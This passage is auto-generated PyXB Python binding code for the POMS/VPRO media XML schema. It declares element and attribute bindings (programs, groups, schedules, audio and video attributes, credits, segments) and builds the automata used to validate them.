# Element releaseYear ({urn:vpro:media:2009}releaseYear) inherited from {urn:vpro:media:2009}baseMediaType
# Element duration ({urn:vpro:media:2009}duration) inherited from {urn:vpro:media:2009}baseMediaType
# Element credits ({urn:vpro:media:2009}credits) inherited from {urn:vpro:media:2009}baseMediaType
# Element award ({urn:vpro:media:2009}award) inherited from {urn:vpro:media:2009}baseMediaType
# Element descendantOf ({urn:vpro:media:2009}descendantOf) inherited from {urn:vpro:media:2009}baseMediaType
# Element memberOf ({urn:vpro:media:2009}memberOf) inherited from {urn:vpro:media:2009}baseMediaType
# Element ageRating ({urn:vpro:media:2009}ageRating) inherited from {urn:vpro:media:2009}baseMediaType
# Element contentRating ({urn:vpro:media:2009}contentRating) inherited from {urn:vpro:media:2009}baseMediaType
# Element email ({urn:vpro:media:2009}email) inherited from {urn:vpro:media:2009}baseMediaType
# Element website ({urn:vpro:media:2009}website) inherited from {urn:vpro:media:2009}baseMediaType
# Element twitter ({urn:vpro:media:2009}twitter) inherited from {urn:vpro:media:2009}baseMediaType
# Element teletext ({urn:vpro:media:2009}teletext) inherited from {urn:vpro:media:2009}baseMediaType
# Element prediction ({urn:vpro:media:2009}prediction) inherited from {urn:vpro:media:2009}baseMediaType
# Element locations ({urn:vpro:media:2009}locations) inherited from {urn:vpro:media:2009}baseMediaType
# Element relation ({urn:vpro:media:2009}relation) inherited from {urn:vpro:media:2009}baseMediaType
# Element images ({urn:vpro:media:2009}images) inherited from {urn:vpro:media:2009}baseMediaType
# Element {urn:vpro:media:2009}poSeriesID uses Python identifier poSeriesID
__poSeriesID = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'poSeriesID'), 'poSeriesID', '__urnvpromedia2009_groupType_urnvpromedia2009poSeriesID', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 841, 10), )
poSeriesID = property(__poSeriesID.value, __poSeriesID.set, None, None)
# Attribute mid inherited from {urn:vpro:media:2009}baseMediaType
# Attribute avType inherited from {urn:vpro:media:2009}baseMediaType
# Attribute sortDate inherited from {urn:vpro:media:2009}baseMediaType
# Attribute embeddable inherited from {urn:vpro:media:2009}baseMediaType
# Attribute hasSubtitles inherited from {urn:vpro:media:2009}baseMediaType
# Attribute mergedTo inherited from {urn:vpro:media:2009}baseMediaType
# Attribute isOrdered uses Python identifier isOrdered
__isOrdered = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'isOrdered'), 'isOrdered', '__urnvpromedia2009_groupType_isOrdered', pyxb.binding.datatypes.boolean, required=True)
__isOrdered._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 843, 8)
__isOrdered._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 843, 8)
isOrdered = property(__isOrdered.value, __isOrdered.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_groupType_type', _module_typeBindings.groupTypeEnum, required=True)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 844, 8)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 844, 8)
type = property(__type.value, __type.set, None, None)
# Attribute defaultElement uses Python identifier defaultElement
__defaultElement = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'defaultElement'), 'defaultElement', '__urnvpromedia2009_groupType_defaultElement', pyxb.binding.datatypes.long)
__defaultElement._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 845, 8)
__defaultElement._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 845, 8)
defaultElement = property(__defaultElement.value, __defaultElement.set, None, None)
# Attribute urn inherited from {urn:vpro:media:2009}baseMediaType
# Attribute publishStart inherited from {urn:vpro:media:2009}baseMediaType
# Attribute publishStop inherited from {urn:vpro:media:2009}baseMediaType
# Attribute publishDate inherited from {urn:vpro:media:2009}baseMediaType
# Attribute creationDate inherited from {urn:vpro:media:2009}baseMediaType
# Attribute lastModified inherited from {urn:vpro:media:2009}baseMediaType
# Attribute workflow inherited from {urn:vpro:media:2009}baseMediaType
_ElementMap.update({
__poSeriesID.name() : __poSeriesID
})
_AttributeMap.update({
__isOrdered.name() : __isOrdered,
__type.name() : __type,
__defaultElement.name() : __defaultElement
})
_module_typeBindings.groupType = groupType
Namespace.addCategoryObject('typeBinding', 'groupType', groupType)
mediaInformation = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'mediaInformation'), mediaTableType, documentation='\n Base element only used when programs, groups and schedule information need to be bundled in one XML. E.g. when distributing to cable companies.\n ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 18, 2))
Namespace.addCategoryObject('elementBinding', mediaInformation.name().localName(), mediaInformation)
schedule = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'schedule'), scheduleType, documentation="\n Programs of type 'BROADCAST' can contain schedule events. A schedule indicates on which channel and at what time the program is broadcast. A schedule is a container which contains the schedule events of different programs, for a certain period of time.\n ", location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 46, 2))
Namespace.addCategoryObject('elementBinding', schedule.name().localName(), schedule)
streamingStatus = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'streamingStatus'), streamingStatus_, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 54, 4))
Namespace.addCategoryObject('elementBinding', streamingStatus.name().localName(), streamingStatus)
program = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'program'), programType, documentation='\n This is the most used entity in POMS. It represents e.g. one broadcast program or one web-only clip. It represent a standalone entity which a consumer can view or listen to.\n ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 25, 2))
Namespace.addCategoryObject('elementBinding', program.name().localName(), program)
group = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'group'), groupType, documentation='\n A groups collects a number of programs and/or other groups. Examples: season, series, playlist and album.\n ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 32, 2))
Namespace.addCategoryObject('elementBinding', group.name().localName(), group)
segment = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'segment'), segmentType, documentation='\n A program can contain a number of segments. A segment is an identifiable part of a program.\n ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 39, 2))
Namespace.addCategoryObject('elementBinding', segment.name().localName(), segment)
mediaTableType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'schedule'), scheduleType, scope=mediaTableType, documentation="\n Programs of type 'BROADCAST' can contain schedule events. A schedule indicates on which channel and at what time the program is broadcast. A schedule is a container which contains the schedule events of different programs, for a certain period of time.\n ", location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 46, 2)))
mediaTableType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'programTable'), programTableType, scope=mediaTableType, documentation='A table with all program objects in this container', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 59, 6)))
mediaTableType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'groupTable'), groupTableType, scope=mediaTableType, documentation='A table with all group objects in this container', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 64, 6)))
mediaTableType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'locationTable'), locationTableType, scope=mediaTableType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 69, 6)))
def _BuildAutomaton ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton
del _BuildAutomaton
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 59, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 64, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 69, 6))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 70, 6))
counters.add(cc_3)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(mediaTableType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'programTable')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 59, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(mediaTableType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'groupTable')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 64, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(mediaTableType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'locationTable')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 69, 6))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(mediaTableType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'schedule')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 70, 6))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
st_3._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
mediaTableType._Automaton = _BuildAutomaton()
programTableType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'program'), programType, scope=programTableType, documentation='\n This is the most used entity in POMS. It represents e.g. one broadcast program or one web-only clip. It represent a standalone entity which a consumer can view or listen to.\n ', location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 25, 2)))
def _BuildAutomaton_ ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_
del _BuildAutomaton_
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 83, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(programTableType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'program')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 83, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
programTableType._Automaton = _BuildAutomaton_()
portalsType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'portal'), organizationType, scope=portalsType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 457, 6)))
def _BuildAutomaton_2 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_2
del _BuildAutomaton_2
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 457, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(portalsType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'portal')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 457, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
portalsType._Automaton = _BuildAutomaton_2()
avAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'bitrate'), pyxb.binding.datatypes.long, scope=avAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 471, 6)))
avAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'byteSize'), pyxb.binding.datatypes.long, scope=avAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 472, 6)))
avAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'avFileFormat'), avFileFormatEnum, scope=avAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 473, 6)))
avAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'videoAttributes'), videoAttributesType, scope=avAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 474, 6)))
avAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'audioAttributes'), audioAttributesType, scope=avAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 475, 6)))
def _BuildAutomaton_3 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_3
del _BuildAutomaton_3
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 471, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 472, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 473, 6))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 474, 6))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 475, 6))
counters.add(cc_4)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(avAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'bitrate')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 471, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(avAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'byteSize')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 472, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(avAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'avFileFormat')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 473, 6))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(avAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'videoAttributes')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 474, 6))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(avAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'audioAttributes')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 475, 6))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_4, True) ]))
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
avAttributesType._Automaton = _BuildAutomaton_3()
videoAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'color'), colorType, scope=videoAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 503, 6)))
videoAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'videoCoding'), pyxb.binding.datatypes.string, scope=videoAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 504, 6)))
videoAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'aspectRatio'), aspectRatioEnum, scope=videoAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 505, 6)))
def _BuildAutomaton_4 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_4
del _BuildAutomaton_4
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 503, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 504, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 505, 6))
counters.add(cc_2)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(videoAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'color')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 503, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(videoAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'videoCoding')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 504, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(videoAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'aspectRatio')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 505, 6))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
st_2._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
videoAttributesType._Automaton = _BuildAutomaton_4()
audioAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'numberOfChannels'), pyxb.binding.datatypes.short, scope=audioAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 536, 6)))
audioAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'audioCoding'), pyxb.binding.datatypes.string, scope=audioAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 537, 6)))
audioAttributesType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'language'), pyxb.binding.datatypes.string, scope=audioAttributesType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 538, 6)))
def _BuildAutomaton_5 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_5
del _BuildAutomaton_5
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 536, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 537, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 538, 6))
counters.add(cc_2)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(audioAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'numberOfChannels')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 536, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(audioAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'audioCoding')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 537, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(audioAttributesType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'language')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 538, 6))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
st_2._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
audioAttributesType._Automaton = _BuildAutomaton_5()
creditsType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'person'), personType, scope=creditsType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 545, 8)))
creditsType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'name'), nameType, scope=creditsType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 546, 8)))
def _BuildAutomaton_6 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_6
del _BuildAutomaton_6
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 544, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(creditsType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'person')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 545, 8))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(creditsType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'name')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 546, 8))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
creditsType._Automaton = _BuildAutomaton_6()
segmentsType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'segment'), segmentType, scope=segmentsType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 625, 6)))
def _BuildAutomaton_7 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_7
del _BuildAutomaton_7
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 625, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(segmentsType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'segment')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 625, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
